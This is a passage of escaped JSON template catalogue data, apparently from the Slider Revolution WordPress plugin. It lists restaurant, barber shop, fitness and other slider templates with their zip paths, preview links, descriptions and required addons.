help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Le Chef Restaurant\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"15\",\"installed\":false},\"235\":{\"id\":\"253\",\"title\":\"Le Chef Food\",\"alias\":\"le-chef-food\",\"zip\":\"packs\\/le-chef-food.zip\",\"uid\":\"cd4b6a2cb5de2dd20a0e8ba0c35451df\",\"img\":\"le-chef-food\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/le-chef-restaurant-website-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=le-chef-restaurant-website-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"5.4.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Le Chef Restaurant\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"15\",\"installed\":false},\"236\":{\"id\":\"254\",\"title\":\"Le Chef La Carte\",\"alias\":\"le-chef-la-carte\",\"zip\":\"packs\\/le-chef-la-carte.zip\",\"uid\":\"6f312749679c3ba52c41189a6b8bf729\",\"img\":\"le-chef-la-carte\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/le-chef-restaurant-website-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=le-chef-restaurant-website-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"5.4.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Le Chef Restaurant\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"15\",\"installed\":false},\"237\":{\"id\":\"255\",\"title\":\"Le Chef Footer\",\"alias\":\"le-chef-footer\",\"zip\":\"packs\\/le-chef-footer.zip\",\"uid\":\"12fc241e8e5b9e5df9758c43448e2907\",\"img\":\"le-chef-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/le-chef-restaurant-website-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=le-chef-restaurant-website-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"5.4.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Le Chef Restaurant\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"15\",\"installed\":false},\"238\":{\"id\":\"256\",\"title\":\"News Magazine Slider\",\"alias\":\"news-magazine-slider\",\"zip\":\"news-magazine-slider.zip\",\"uid\":\"31f2c1506babb1fef459401f051d2d52\",\"img\":\"news-magazine-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/news-magazine-slider-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=news-magazine-slider-for-wordpress\",\"version\":\"1.0.1\",\"required\":\"5.4.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Magazine Slider offers various layouts that support static content images, HTML5 and Youtube video. Great for any blog or news website!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-revealer-addon\\\\\\/revslider-revealer-addon.php\\\",\\\"name\\\":\\\"Reveal AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"239\":{\"id\":\"257\",\"title\":\"Real Estate Slider\",\"alias\":\"real-estate-slider\",\"zip\":\"real-estate-slider.zip\",\"uid\":\"739ce6336e46815094387c9448e6c804\",\"img\":\"real-estate-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/real-estate-slider-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=real-estate-slider-for-wordpress\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Real Estate Slider allows to display real estate offers with a large ken burns background image and additional thumbnail hover images.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"240\":{\"id\":\"258\",\"title\":\"Fashion Header\",\"alias\":\"fashion-header\",\"zip\":\"fashion-header.zip\",\"uid\":\"24ece4e7f4d31cd90377c62abbd9e25a\",\"img\":\"fashion-header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/fashion-shop-header-slider-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=fashion-shop-header-slider-for-wordpress\",\"version\":\"1.0.0\",\"required\":\"5.4.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Fashion Shop Header ist the ideal Slider to display as an intro to your shop website or as a separator in between content. Our unique \\\"Bubble Morph\\\" effect makes this module stand out!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-bubblemorph-addon\\\\\\/revslider-bubblemorph-addon.php\\\",\\\"name\\\":\\\"BubbleMorph AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"241\":{\"id\":\"259\",\"title\":\"Seasonal Offer\",\"alias\":\"seasonaloffer\",\"zip\":\"seasonaloffer.zip\",\"uid\":\"caf2f17f8fd64f2f89dcb3c8dd238457\",\"img\":\"seasonaloffer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/seasonal-offer-christmas-header-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=seasonal-offer-christmas-header-for-wordpress\",\"version\":\"1.0.0\",\"required\":\"5.4.8.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Use the Seasonal Offer Header to promote special offers in the holiday season, or just to add some snowy christmas spirit to your website!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-snow-addon\\\\\\/revslider-snow-addon.php\\\",\\\"name\\\":\\\"Snow AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"242\":{\"id\":\"260\",\"title\":\"Barber Shop\",\"alias\":\"barber-shop\",\"zip\":\"\",\"uid\":\"barber-shop-package\",\"img\":\"packages\\/barber-shop-package.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/barber-shop-template-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=barber-shop-template-for-wordpress\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Barber Shop\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"16\",\"installed\":false},\"243\":{\"id\":\"261\",\"title\":\"Barber Shop Header\",\"alias\":\"barber-shop-header\",\"zip\":\"packs\\/barber-shop-header.zip\",\"uid\":\"71c995d36d39a0e8a04cffdf753f2ba2\",\"img\":\"barber-shop-header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/barber-shop-template-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=barber-shop-template-for-wordpress\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Barber Shop\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"16\",\"installed\":false},\"244\":{\"id\":\"262\",\"title\":\"Barber Shop Mobile Menu\",\"alias\":\"barber-shop-mobile-menu\",\"zip\":\"packs\\/barber-shop-mobile-menu.zip\",\"uid\":\"762c6fb5c6306f37becb1e55773c2592\",\"img\":\"barber-shop-mobile-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/barber-shop-template-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=barber-shop-template-for-wordpress\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Barber Shop\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"16\",\"installed\":false},\"245\":{\"id\":\"263\",\"title\":\"Barber Shop First Screen\",\"alias\":\"barber-shop-first-screen\",\"zip\":\"packs\\/barber-shop-first-screen.zip\",\"uid\":\"acf70bfd64cff2c3c2ea5585223575da\",\"img\":\"barber-shop-first-screen\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/barber-shop-template-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=barber-shop-template-for-wordpress\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Barber Shop\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"16\",\"installed\":false},\"246\":{\"id\":\"264\",\"title\":\"Barber Shop About\",\"alias\":\"barber-shop-about\",\"zip\":\"packs\\/barber-shop-about.zip\",\"uid\":\"bc8b63cfc7f8c34173b4fd5b082fc05a\",\"img\":\"barber-shop-about\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/barber-shop-template-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=barber-shop-template-for-wordpress\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Barber Shop\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"16\",\"installed\":false},\"247\":{\"id\":\"265\",\"title\":\"Barber Shop Services\",\"alias\":\"barber-shop-services\",\"zip\":\"packs\\/barber-shop-services.zip\",\"uid\":\"d65121d6f84fabd812a2b621b768e10e\",\"img\":\"barber-shop-services\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/barber-shop-template-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=barber-shop-template-for-wordpress\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Barber Shop\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"16\",\"installed\":false},\"248\":{\"id\":\"266\",\"title\":\"Barber Shop Barbers\",\"alias\":\"barber-shop-barbers\",\"zip\":\"packs\\/barber-shop-barbers.zip\",\"uid\":\"003e9fec9693072119c8f8d8b6690c4d\",\"img\":\"barber-shop-barbers\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/barber-shop-template-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=barber-shop-template-for-wordpress\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Barber Shop\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"16\",\"installed\":false},\"249\":{\"id\":\"267\",\"title\":\"Barber Shop Contacts\",\"alias\":\"barber-shop-contacts\",\"zip\":\"packs\\/barber-shop-contacts.zip\",\"uid\":\"cdcc08f5d6c90dbcfd0502bda2401643\",\"img\":\"barber-shop-contacts\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/barber-shop-template-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=barber-shop-template-for-wordpress\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Barber Shop\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"16\",\"installed\":false},\"250\":{\"id\":\"268\",\"title\":\"Barber Shop Footer\",\"alias\":\"barber-shop-footer\",\"zip\":\"packs\\/barber-shop-footer.zip\",\"uid\":\"26ca5ae0de7cdbb2ca19348b6e01eda0\",\"img\":\"barber-shop-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/barber-shop-template-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=barber-shop-template-for-wordpress\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Barber Shop\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"16\",\"installed\":false},\"251\":{\"id\":\"269\",\"title\":\"Fitness Club\",\"alias\":\"fitness-club-template\",\"zip\":\"fitness-club-template.zip\",\"uid\":\"14ea10d68d6aad1df62b3becf71df754\",\"img\":\"fitness-club-template\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/fitness-club-header-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=fitness-club-header-for-wordpress\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Fitness Club Header is the perfect introduction to your fitness themed website. Showcase your current offers or service portfolio with sleek transitions!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"252\":{\"id\":\"270\",\"title\":\"Soccer School\",\"alias\":\"soccer-school\",\"zip\":\"soccer-school.zip\",\"uid\":\"9906b48812aff67097f990eeee42dd41\",\"img\":\"soccer-school\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/soccer-club-slider-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=soccer-club-slider-for-wordpress\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Soccer Club Header is the perfect introduction to your Soccer School themed website. Showcase your current offers or service portfolio with sleek transitions!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-revealer-addon\\\\\\/revslider-revealer-addon.php\\\",\\\"name\\\":\\\"Reveal AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"253\":{\"id\":\"271\",\"title\":\"Music Band\",\"alias\":\"music-band-template\",\"zip\":\"music-band-template.zip\",\"uid\":\"91e79657bf1b1812f8114a00ab8e0eb4\",\"img\":\"music-band-template\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/music-band-template-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=music-band-template-for-wordpress\",\"version\":\"1.0.1\",\"required\":\"5.4.8.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Music Band Header is the perfect introduction to your Music Band themed website. Showcase your current songs, albums and videos with sleek transitions!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-revealer-addon\\\\\\/revslider-revealer-addon.php\\\",\\\"name\\\":\\\"Reveal AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"254\":{\"id\":\"272\",\"title\":\"Restaurant Menu\",\"alias\":\"restaurant-menu\",\"zip\":\"restaurant-menu.zip\",\"uid\":\"078809cffb21b6c4d3f5aaa2daeb193d\",\"img\":\"restaurant-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/restaurant-menu-slider-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=restaurant-menu-slider-for-wordpress\",\"version\":\"1.0.0\",\"required\":\"5.4.8.3\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Restaurant Menu Header is the perfect introduction to your Restaurant themed website. Showcase your current dishes with sleek transitions!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Digital Menu Teaser 